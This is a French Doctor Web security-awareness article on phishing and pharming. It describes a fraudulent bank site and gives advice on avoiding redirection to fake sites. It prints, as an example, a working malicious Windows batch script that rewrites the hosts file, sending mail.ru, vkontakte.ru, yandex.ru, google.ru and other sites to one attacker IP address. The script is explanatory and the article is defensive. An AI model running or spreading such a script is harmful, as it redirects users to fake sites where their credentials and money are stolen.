Vous utilisez un navigateur obsolète !

L'affichage de la page peut être incorrect.

  • Ajouter aux favoris
    Ajouter aux favoris

Phishing, pharming ! Oh my!

Lu par: 13628 Commentaires: 2 Cote de popularité: 41

mercredi 8 février 2017

Aujourd’hui, la plupart des utilisateurs connaissent les dangers du phishing – un type de cyber fraude qui consiste à envoyer des emails offrant différents biens et services. La prise de conscience des internautes augmentant, ils sont plus attentifs et suspicieux face aux emails qu’ils reçoivent.

En réponse, les criminels inventent de nouveaux pièges pour être plus crédibles et instaurer de la confiance afin de voler de l’argent.

#drweb

La Banque de Russie a signalé le site Mngb.ru qui offrait des services illégalement au nom d’une certaine Metro Neal Guardian Bank. Cette organisation n’avait jamais reçu de licence pour opérer sur le territoire de Russie.

Le site Mngb.ru prétendait, lui, que la fameuse banque avait son siège social à Washington DC et fournissait une fausse adresse pour sa filiale russe.

Les fraudeurs proposaient des cartes Visa et MasterCard.

Comme pour le phishing, les schémas qui sous-tendent le pharming impliquent l’utilisation de sites frauduleux, mais les utilisateurs ne sont même pas amenés à cliquer sur un lien pour y accéder.

Même si l’internaute entre une URL correcte, il sera redirigé automatiquement vers un site pirate.

Pour parvenir à cela, les fraudeurs utilisent des malwares et modifient le fichier hosts ainsi que les paramètres du serveur DNS. Une attaque peut ainsi être menée furtivement et l’implication de l’utilisateur est minimale. Une attaque ciblée est également possible. Les criminels ont seulement besoin d’attendre qu’un utilisateur se décide à visiter un site en particulier.

Est-ce difficile de pousser un utilisateur à visiter un faux site ? Voici un exemple de piège.

-Bonjour, je n’arrive pas à ouvrir un fichier qui contient des informations importantes ; Peux-tu essayer de l’ouvrir sur ton ordinateur ?
-Bien sûr.

...

L’utilisateur confiant clique sur le fichier et le code suivant est exécuté :

@rem ----- ExeScript Options Begin -----
@rem ScriptType: console
@rem DestDirectory: temp
@rem Icon: default
@rem ----- ExeScript Options End -----
@echo off
echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts

Par ailleurs, 662 chaînes vides précèdent le script dans le fichier.

https://habrahabr.ru/post/73515

Par conséquent, au lieu des sites listés ci-dessus, l’utilisateur atterrira sur un faux site.

Le projet Lumières sur la sécurité recommande

Les schémas de pharming sont difficiles à identifier parce que le « look and feel » des sites d’entreprises changent souvent et que les utilisateurs ne font pas forcément attention à ces changements. Pour être sûr que vous n’avez pas été redirigé vers un faux site, vous pouvez :

  • Utiliser la Protection Préventive de Dr.Web Security Space pour sélectionner le niveau de sécurité qui vous convient.

    #drweb

    #drweb

    Pour configurer la Protection Préventive, cliquez sur l’icône #drweb dans la barre des tâches ; dans le menu qui s’ouvre, cliquez #drweb sur et #drweb. Dans la fenêtre Configuration, choisissez Composants de protection puis Protection préventive.

    Dans la fenêtre Configuration, choisissez Composants de protection puis Protection préventive.

    #drweb

  • Parce que de nombreux utilisateurs se connectent sur leur ordinateur sous un compte ayant les privilèges administrateur, les pirates qui parviennent à prendre le contrôle de leur machine bénéficient de ces privilèges et peuvent modifier les paramètres réseau. Une fois que vous avez configuré tous vos paramètres système, n’utilisez pas un compte avec les privilèges administrateur.
  • Vérifiez régulièrement votre relevé de compte. Les systèmes de banque en ligne sont pratiques pour les utilisateurs comme pour les pirates. Les banques informent leurs clients de toutes les transactions ou seulement de celles qu’ils trouvent suspectes sur leur compte, mais ces notifications peuvent être masquées ou falsifiées.

    Seul vous savez où et quand votre argent a été dépensé ; pensez donc à vérifier votre compte régulièrement.

  • Installez toutes les mises à jour de sécurité de l’OS et des logiciels que vous utilisez.
  • N’entrez jamais de données confidentielles (personnelles) si vous naviguez sur un site que vous avez atteint en cliquant sur un lien externe ou en cliquant sur une fenêtre pop-up (sauf si le site semble légitime). Ouvrez une nouvelle fenêtre du navigateur et entrez l’adresse IP du site pour être sûr que le site que vous visitez n’est pas un faux. Assurez-vous que l’URL dans la barre d’adresse est correcte.
  • Si vous recevez un email de la part de votre banque, d’une boutique en ligne, d’un réseau social ou de toute autre entreprise, assurez-vous que l’adresse de l’expéditeur est officielle. Les banques n’utilisent pas de domaines publics comme gmail.com, yahoo.co.uk, etc.
  • Détruisez les données financières qui ne vous servent plus. Les gens jettent souvent à la corbeille des papiers contenant des données bancaires, des mots de passe ect. Tout support contenant des données personnelles, y compris les relevés de compte et les cartes bancaires expirées devraient être déchirées en mille morceaux.
  • Rapportez les incidents concernant la fraude sur Internet. Vous pouvez notamment le faire via notre site web en envoyant une requête à notre support. Vos retours sont importants, et pas seulement pour nous ; Cela peut aider tous les utilisateurs.

[Twitter]

Nous apprécions vos commentaires

Pour laisser un commentaire, vous devez accéder au site via votre compte sur le site de Doctor Web. Si vous n'avez pas de compte, vous pouvez le créer.

Commentaires des utilisateurs